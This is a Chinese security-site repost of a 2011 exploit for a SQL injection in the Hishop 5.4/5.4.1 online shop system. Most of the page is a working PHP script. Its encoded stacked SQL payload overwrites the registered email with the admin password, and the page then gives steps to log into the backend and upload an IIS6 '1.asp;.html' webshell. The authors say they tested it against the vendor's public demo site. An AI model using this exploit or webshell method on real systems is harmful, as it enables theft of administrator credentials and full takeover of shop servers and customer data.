首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
Hishop 5.4&5.4.1 SQL 注入漏洞EXP
来源:九区 作者:Vccjis 发布时间:2011-06-13  

Hishop网店系统V5.4正式版是海商网络拥有产权自主开发的基于WEB应用的B/S架构的B2C网上商城系统,主要面向企业和大中型网商提供最佳保障,最大化满足客户目前及今后的独立网店应用需求。该系统运行于微软公司的.NET 平台,采用最新的ASP.NET 2.0技术进行分层开发。通过9年30万以上用户群的广泛应用和复杂化环境的检测,系统在安全性、稳定性、易用性方面具备良好的声誉。V5.4正式版在5.3正式版基础上新增团购、限时抢购等众多实用功能,功能全面优化、系统全新升级

hishop 自从09年 5.1 和5.1.3爆过漏洞之后就没爆了。。

前段时间看了下,找到一个注入点,不过语句有点复杂而且还过滤了下划线(表名当中都有下划线),所以需要特别构造下,

这个注入点再结合iis6就能拿shell了。

-------------------------------EXP-----------------------------------

<?php
print_r(‘
+—————————————————————————+
Hishop 5.4&5.4.1 SQL injection exploit            By: Vccjis & 蓝孩(b1u3b0y)
Team : Www.MyClover.Org
Data : 2011.6.9
+—————————————————————————+
‘);
if ($argc < 3) {
    print_r(‘
+—————————————————————————+
Usage: php ‘.$argv[0].’ Host Port Path RegMail
Example:
php ‘.$argv[0].’ localhost 80 /SHOES/category-92.aspx?valueStr=35_0 syc@myclover.org
+—————————————————————————+
‘);
    exit;
}
$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$mail = $argv[4];
$expdata=”";  
for($i=0;$i<strlen($mail);$i++)  
$expdata = $expdata . dechex(ord($mail[$i])) . “00″;
$expdata=strtoupper($expdata);
$expdata = “%27)%20or%201=1;DECLARE%20@S%20NVARCHAR(4000)%20SET%20@S=CAST(0x75007000640061007400650020006100730070006E00650074005F004D0065006D0062006500720073006800690070002000730065007400200045006D00610069006C003D002800730065006C006500630074002000700061007300730077006F00720064002000660072006F006D0020006100730070006E00650074005F006D0065006D00620065007200730068006900700020007700680065007200650020007500730065007200690064003D002800730065006C0065006300740020007500730065007200690064002000660072006F006D0020006100730070006E00650074005F0075007300650072007300200077006800650072006500200075007300650072006E0061006D0065003D002700610064006D0069006E00270029002900200077006800650072006500200045006D00610069006C003D002700″ . $expdata . “2700%20AS%20NVARCHAR(4000))%20EXEC(@S);–”;    
GET($host,$port,$path,$expdata,30);

function GET($host,$port,$path,$data,$timeout, $cookie=”) {
        $fp = fsockopen($host, $port, $errno, $errstr, 30);   
        if (!$fp) {   
           echo “{$errstr} ({$errno})<br />\n”;   
           exit;   
        }   
  
$out = “GET $path$data HTTP/1.1\r\n”;   
$out .= “Host: $host:$port\r\n”;   
$out .= “Connection: CLOSE\r\n\r\n\r\n”;   
  
fwrite($fp, $out);   
while (!feof($fp)) {   
   fgets($fp, 128);

fclose($fp);
}

print_r(‘
+—————————————————————————+
[+] Get Manager Password
[1] 到【登陆】-》【我的账户】-》【个人信息】
[2] 电子邮件那里就是管理员的密码。
[3] Good Luck!
+—————————————————————————+
[+] Get WebShell (IIS6)
[1] 登陆后台/admin/ 【商品管理】-》【分类模板设置】
[2] 上传1.asp;.html
[3] Shell地址:http://127.0.0.1/Themes/default/zh-cn/categorythemes/1.asp;.html
+—————————————————————————+
‘);
?>

 

-------------------------------------------------------------------------------------------------

选这种类似的URL

这个exp针对的管理员用户名为admin,另外一个版本在调试,有点问题。
但这个是木有问题的。
下午本地搭建了一个5.4.1的和5.4的都测试通过。
官方的demo站点也行。

Fr0m 九区

作者:Vccjis & 蓝孩(b1u3b0y),由情整理编辑



 

 

 

 官网演示站测试




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·BOSSI 公司(企业)网站管理系统注
·教育站漏洞批量拿shell
·dedecms 5.7后台拿SHELL
·eFront添加管理员CSRF漏洞
·Discuz!7.0-7.2和Phpwind7.5后台
·rgboard <=4.2.0 任意文件下载漏
·ecshop最新版 (v272) 本地包含拿
·5UCMS最新注入漏洞
·关于firefox的2个插件的漏洞
·Foxmail Server上传漏洞&任意文
·极速安康学校网站程序 v3.1.1 co
·讯时网站管理系统CMS v4.0以下版
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved